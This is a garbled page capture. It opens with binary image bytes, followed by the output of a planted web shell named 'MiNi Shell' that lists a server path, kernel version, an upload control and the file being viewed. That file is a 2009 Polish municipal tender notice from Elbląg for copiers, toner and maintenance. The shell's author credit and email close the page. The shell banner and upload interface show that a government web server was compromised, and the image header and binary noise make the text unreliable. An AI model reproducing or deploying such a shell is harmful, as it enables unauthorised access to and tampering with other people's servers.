JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148538-N-2009.html

<p class="kh_header"><b>Elbląg: Dostawa kopiarek i tonerów oraz serwis gwarancyjny i pogwarancyjny</b><br>
<b>Numer ogłoszenia: 148538 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Miejski , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 2353536, 2393125, faks 055 2353555, 2393334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kopiarek i tonerów oraz serwis gwarancyjny i pogwarancyjny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:

Dostawa kopiarek i tonerów oraz serwis gwarancyjny i pogwarancyjny 

Przedmiot główny:
Nazewnictwo wg CPV:	Urządzenia fotokopiujące i do druku offsetowego

Przedmioty dodatkowe:
Nazewnictwo wg CPV:	  Wkłady barwiące
Nazewnictwo wg CPV:	Usługi w zakresie konserwacji fotokopiarek

Miejsce dostawy: Urząd Miejski w Elblągu, 82-300 Elbląg, ul. Łączności 1, parter pok. 106, 112 i 113 oraz Miejski Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Elblągu, Al. Tysiąclecia 11. 

Przedmiotem zamówienia jest dostawa fabrycznie nowych niżej opisanych kopiarek i tonerów oraz serwis gwarancyjny i pogwarancyjny:

1)	Fabrycznie nowa kopiarka cyfrowa monochromatyczna 
  Ilość - 4 szt.
			
Wymagane parametry techniczne i eksploatacyjne:
 
a.	 technologia druku laserowa
b.	 prędkość kopiowania				- minimum 16 kopii / min (formatu A4),  
c.	 rozdzielczość kopiowania			             - minimum 600x600 dpi, 
d.	 format oryginału					- do A3 włącznie
e.	 format  kopii					- od A6 do A3
f.	 zoom 						- od 25% do 400 % co 1%
g.	 wewnętrzna taca odbioru dokumentów
h.	 podajnik dokumentów dwustronny
i.	 dupleks 
j.	 źródła podawania papieru			- minimum 2, w tym:
	 - minimum 1 kaseta uniwersalna na minimum 300 kartek papieru o gramaturze 
     	     80g / m2
            		 -  ręczny podajnik na minimum 50 kartek papieru o gramaturze 80g / m2
k.	 gramatura papieru				- od minimum 45 do 160 g / m2  
l.	 kopiowanie ciągłe				- od 1do 999 kopii
m.	 tryb nadzoru					- minimum 100 kodów użytkownika
n.	 wydajność tonera				- minimum 15 tys. kopii A4 przy 6%  
							 	  zaczernieniu
o.	 żywotność  bębna				- minimum 150 tys. kopii
p.	 czas nagrzewania				- nie dłużej niż 20 sek.
q.	 czas uzyskania pierwszej kopii			- nie dłużej niż 6 sek.
r.	 poziom hałasu w trybie pracy/oczekiwania 	- maksimum 64db/40db
s.	 pobór mocy w czasie kopiowania			- poniżej 500 W / h
t.	 pamięć kopiarki					- minimum 32 MB
u.	 sorter elektroniczny w standardzie
v.	 panel operatora w j. polskim
w.	 wyświetlacz komunikatów w j. polskim
x.	kopiarka powinna posiadać możliwość rozbudowy o:
	 -  minimum 3 dodatkowe kasety na papier,
	 -  kontroler drukarki GDI ( interfejs USB 2.0),
	 -  serwer wydruków sieciowych.
y.	 kopiarka powinna być gotowa do pracy z tonerem startowym
z.	szafka na kółkach pod kopiarkę z płyty meblowej w kolorze kopiarki

Gwarancja na kopiarki na minimum 36 miesięcy licząc od daty uruchomienia kopiarek lub wykonanie przez każdą z kopiarek po minimum 150 tys. kopii.

2)	Fabrycznie nowe tonery czarne na minimum 15 tys. kopii A4 każdy przy 6%  zaczernieniu do opisanej w Sekcji II.1.3) ppkt 1.1) ogłoszenia kopiarki cyfrowej monochromatycznej
Ilość - 9 szt. 

3)	Serwis gwarancyjny i pogwarancyjny.

1.1.	Zamawiający wymaga, aby Wykonawca świadczył usługi serwisu gwarancyjnego 
i pogwarancyjnego w następujący sposób: 

1)	Przeglądy konserwacyjne kopiarek będą wykonywane co 3 miesiące.
Wysokość opłaty jednego przeglądu konserwacyjnego będzie obowiązywała przez okres 36 miesięcy od dnia uruchomienia kopiarek i musi zawierać wszystkie koszty związane 
z wykonaniem przeglądu, w tym koszt dojazdu.
W okresie 36 miesięcy od dnia uruchomienia kopiarek będzie wykonanych 48 przeglądów konserwacyjnych dla 4 kopiarek po 12 dla każdej kopiarki.

2)	Konserwacje kopiarek polegające na wymianie zużywających się elementów kopiarek będą wykonywane zgodnie z zaleceniami producenta.
Wysokość opłaty jednej konserwacji po wykonaniu minimum 150 tys. kopii będzie obowiązywała przez okres 36 miesięcy od dnia uruchomienia kopiarek i musi zawierać wszystkie koszty związane z wykonaniem konserwacji, w tym: koszt wymienionych elementów kopiarek tj. zespołu serwisowego z gwarancją na dalsze 150 tys. kopii, koszt robocizny oraz koszt dojazdu.
Zamawiający przewiduje wykonanie 8 konserwacji dla 4 kopiarek po 2 konserwacje dla każdej kopiarki.

1.2.	Zamawiający wymaga złożenia kart katalogowych, folderów wraz z opisem urządzeń, zawierającym parametry techniczne i eksploatacyjne, potwierdzające spełnianie przez oferowane urządzenia wszystkich wymagań opisanych w Sekcji II.1.3)  ppkt 1.1) ogłoszenia.

1.3.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty:
Zamawiający nie przewiduje zmian postanowień zawartej umowy.

1.4.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

1.5.	Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.

2.	Zakres zamówienia obejmuje:
1)	dostawę fabrycznie nowych kopiarek cyfrowych monochromatycznych z tonerem 
startowym	        									-  4 szt.
2)	dostawę fabrycznie nowych tonerów czarnych na minimum 15 tys. kopii A4 
każdy przy 6% zaczernieniu do opisanej w Sekcji II.1.3)  ppkt 1.1) ogłoszenia kopiarki 
cyfrowej monochromatycznej					   	       	       	-   9 szt. 
3)	serwis gwarancyjny i pogwarancyjny - zgodnie ze wzorem Umowy stanowiącym 
     ZAŁĄCZNIK NR 3 do SIWZ.

Zamawiający wymaga złożenia:

 - zgodnie z pkt VI ppkt 2.1. SIWZ Oświadczenia wynikającego z art. 25 ust. 1 pkt 2)    ustawy Prawo zamówień    publicznych.
Uwaga:
a)	   Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa  każdy      
       z  Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

- zgodnie z pkt VI. ppkt 2.2. SIWZ Kart katalogowych, folderów wraz z opisem urządzeń, zawierającym parametry techniczne i eksploatacyjne, potwierdzające spełnianie przez oferowane urządzenia wszystkich wymagań opisanych w Sekcji II.1.3)  ppkt 1.1) ogłoszenia.
  Uwaga:
a)	Dokumenty wymienione w pkt 2.2. SIWZ muszą być w języku polskim.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.00.00-6, 30.12.51.00-2, 50.31.32.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;


3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI. ppkt 1.1. SIWZ i dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ.
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ. 
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-  zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych.
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.


Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

UWAGA:

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125, 82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
   - 10 dni od daty udzielenia zamówienia - dostawa kopiarek i tonerów
   - serwis gwarancyjny i pogwarancyjny od dnia uruchomienia kopiarek - 36 miesięcy lub wykonanie przez kopiarki cyfrowe monochromatyczne po minimum 150 tys. kopii każda

Creat By MiNi SheLL
Email: jattceo@gmail.com